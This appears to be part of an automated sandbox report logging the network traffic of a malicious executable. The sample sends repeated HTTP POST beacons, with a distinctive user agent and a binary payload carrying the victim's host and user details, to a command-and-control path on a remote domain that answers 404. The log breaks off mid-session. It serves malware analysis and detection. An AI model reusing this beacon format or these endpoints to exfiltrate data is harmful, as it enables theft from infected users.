X-Powered-By: PHP/7.2.34
Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49747 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:13:03.456110954 CET | 1433 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 190
Connection: close
Feb 22, 2021 19:13:03.791301966 CET | 1434 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: 'ckav.rujones910646DESKTOP-716T771+08F9C4E9C79A3B52B3F739430mPPQc
Feb 22, 2021 19:13:04.158847094 CET | 1446 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:13:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.4 | 49757 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:13:16.098573923 CET | 1548 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
Feb 22, 2021 19:13:16.432831049 CET | 1548 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:13:16.800559998 CET | 1548 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:13:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.4 | 49758 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:13:17.407438040 CET | 1549 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
Feb 22, 2021 19:13:17.742592096 CET | 1549 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:13:18.107852936 CET | 1550 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:13:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.4 | 49759 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:13:18.738996983 CET | 1551 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
Feb 22, 2021 19:13:19.073930979 CET | 1551 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:13:19.442205906 CET | 1551 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:13:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.4 | 49760 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:13:20.041934967 CET | 1566 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
Feb 22, 2021 19:13:20.379368067 CET | 1574 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:13:20.749983072 CET | 1575 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:13:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.4 | 49763 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:13:21.333542109 CET | 1576 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
Feb 22, 2021 19:13:21.678217888 CET | 1576 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:13:22.060681105 CET | 1576 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:13:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.4 | 49764 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:13:22.669300079 CET | 1577 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
Feb 22, 2021 19:13:23.005808115 CET | 1577 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:13:23.380831003 CET | 1578 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:13:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.4 | 49765 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:13:24.013552904 CET | 1578 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
Feb 22, 2021 19:13:24.359314919 CET | 1579 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:13:24.744710922 CET | 1579 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:13:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
17 | 192.168.2.4 | 49766 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:13:25.353621006 CET | 1580 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
Feb 22, 2021 19:13:25.689847946 CET | 1580 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:13:26.056929111 CET | 1581 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:13:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
18 | 192.168.2.4 | 49767 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:13:26.968743086 CET | 1581 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
Feb 22, 2021 19:13:27.304826021 CET | 1582 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:13:27.672360897 CET | 1582 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:13:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
19 | 192.168.2.4 | 49768 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:13:28.278127909 CET | 1583 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
Feb 22, 2021 19:13:28.616413116 CET | 1583 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:13:28.982165098 CET | 1584 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:13:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          2 | 192.168.2.4 | 49749 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:04.676480055 CET | 1448 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:05.014952898 CET | 1448 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:05.396814108 CET | 1448 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:05 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          20 | 192.168.2.4 | 49769 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:29.579658985 CET | 1584 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:29.916177034 CET | 1585 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:30.280127048 CET | 1585 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:30 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          21 | 192.168.2.4 | 49770 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:30.894737959 CET | 1586 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:31.232486963 CET | 1586 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:31.604202986 CET | 1586 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:31 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          22 | 192.168.2.4 | 49771 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:32.184418917 CET | 1587 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:32.523749113 CET | 1588 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:32.894319057 CET | 1588 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:32 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          23 | 192.168.2.4 | 49772 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:33.518151999 CET | 1589 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:33.856682062 CET | 1589 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:34.233598948 CET | 1589 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:34 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          24 | 192.168.2.4 | 49773 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:34.813981056 CET | 1590 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:35.148798943 CET | 1591 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:35.516104937 CET | 1591 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:35 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          25 | 192.168.2.4 | 49774 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:36.095386982 CET | 1592 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:36.434465885 CET | 1593 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:36.808944941 CET | 1653 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:36 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          26 | 192.168.2.4 | 49777 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:37.374891996 CET | 1681 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:37.711201906 CET | 1739 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:38.080215931 CET | 1774 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:37 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          27 | 192.168.2.4 | 49781 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:38.688700914 CET | 1837 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
